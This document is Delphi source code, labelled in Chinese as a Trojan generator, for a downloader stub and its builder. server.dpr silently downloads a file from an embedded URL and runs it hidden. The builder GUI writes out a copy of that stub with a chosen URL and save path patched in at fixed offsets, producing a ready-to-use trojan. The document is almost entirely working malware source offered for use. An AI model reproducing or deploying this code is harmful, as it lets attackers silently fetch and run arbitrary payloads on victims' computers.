server.dpr
program server;
uses URLMon,ShellApi;//Windows;
var
url: pchar ='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
lf: pchar ='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
function DownloadFile(SourceFile, DestFile: string): Boolean;
begin
try
Result := UrlDownloadToFile(nil, PChar(SourceFile), PChar(DestFile), 0, nil) = 0;
except
Result := False;
end;
end;
begin
if DownloadFile(url, lf) then
begin
ShellExecute(0, PChar('open'), PChar(lf),PChar(''), nil, 0);
//winexec(PChar(l),SW_HIDE);
end;
end.
server.rc
urlmm RCDATA server.exe
brcc.bat
path=C:/Program Files/Borland/Delphi7/Bin;
Brcc32 server.rc
主工程文件:
program Project1;
uses
Forms,
Unit1 in 'Unit1.pas' {Form1};
{$R *.res}
{$R server.res}
begin
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.Run;
end.
生成木马主文件:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls;
const
OFFSET_URL = 10528;
OFFSET_LFILE = 10596;
type
TForm1 = class(TForm)
Label1: TLabel;
Label2: TLabel;
EdtUrl: TEdit;
EdtLFile: TEdit;
Button1: TButton;
Button2: TButton;
Button3: TButton;
procedure Button2Click(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure Button3Click(Sender: TObject);
private
{ Private declarations }
function HexToDec(const Value :Integer) : string;
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.Button2Click(Sender: TObject);
begin
close;
end;
procedure TForm1.Button1Click(Sender: TObject);
var
WriteBuff, ResultFilePath, ResourcePointer: PChar;
ResourceLocation: HRSRC;
ResourceSize, BytesWritten: Longword;
ResDataHandle: THandle;
FileHandle: THandle;
sf:TSaveDialog;
Url,LFile :string;
begin
if trim(EdtUrl.Text)='' then
begin
Application.MessageBox(pchar('请输入下载地址!'), '提示信息', mb_iconinformation);
exit;
end;
if trim(EdtLFile.Text)='' then
begin
Application.MessageBox(pchar('请输入保存路径!'), '提示信息', mb_iconinformation);
exit;
end;
sf :=TSaveDialog.Create(Application);
sf.DefaultExt :='exe';
sf.Title :='生成木马文件';
if not sf.Execute then exit;
Url :=trim(EdtUrl.Text);
LFile :=trim(EdtLFile.Text);
ResultFilePath := pchar(sf.FileName);
ResourceLocation := FindResource(HInstance, 'urlmm', RT_RCDATA);
if ResourceLocation <> 0 then
begin
ResourceSize := SizeofResource(HInstance, ResourceLocation);
if ResourceSize <> 0 then
begin
ResDataHandle := LoadResource(HInstance, ResourceLocation);
if ResDataHandle <> 0 then
begin
ResourcePointer := LockResource(ResDataHandle);
if ResourcePointer <> nil then
begin
FileHandle := CreateFile(ResultFilePath, GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
if FileHandle <> INVALID_HANDLE_VALUE then
begin
WriteFile(FileHandle, ResourcePointer^, ResourceSize, BytesWritten, nil);
Sleep(10);
SetFilePointer(FileHandle, OFFSET_URL, nil, FILE_BEGIN);
WriteBuff := PChar(Url + StringOfChar(#0, 64 - Length(Url)));
WriteFile(FileHandle, WriteBuff^, 65, BytesWritten, nil);
SetFilePointer(FileHandle, OFFSET_LFILE, nil, FILE_BEGIN);
WriteBuff := PChar(LFile + StringOfChar(#0, 64 - Length(LFile)));
WriteFile(FileHandle, WriteBuff^, 65, BytesWritten, nil);
CloseHandle(FileHandle);
end;
end;
end;
end;
end;
end;
function TForm1.HexToDec(const Value: Integer): string;
CONST
HEX : ARRAY['A'..'F'] OF INTEGER =(10,11,12,13,14,15);
VAR
str : String;
Int : Integer;
i : integer;
BEGIN
Str := UpperCase(IntToStr(Value));
Int := 0;
FOR i := 1 TO Length(str) DO
IF str[i] < 'A' THEN
Int := Int * 16 + ORD(str[i]) - 48
ELSE
Int := Int * 16 + HEX[str[i]];
Result := IntToStr(Int);
end;
procedure TForm1.Button3Click(Sender: TObject);
begin
if trim(edtUrl.Text)='' then exit;
try
EdtLFile.Text :=HexToDec(strtoint(trim(EdtUrl.Text)));
except
end;
end;
end.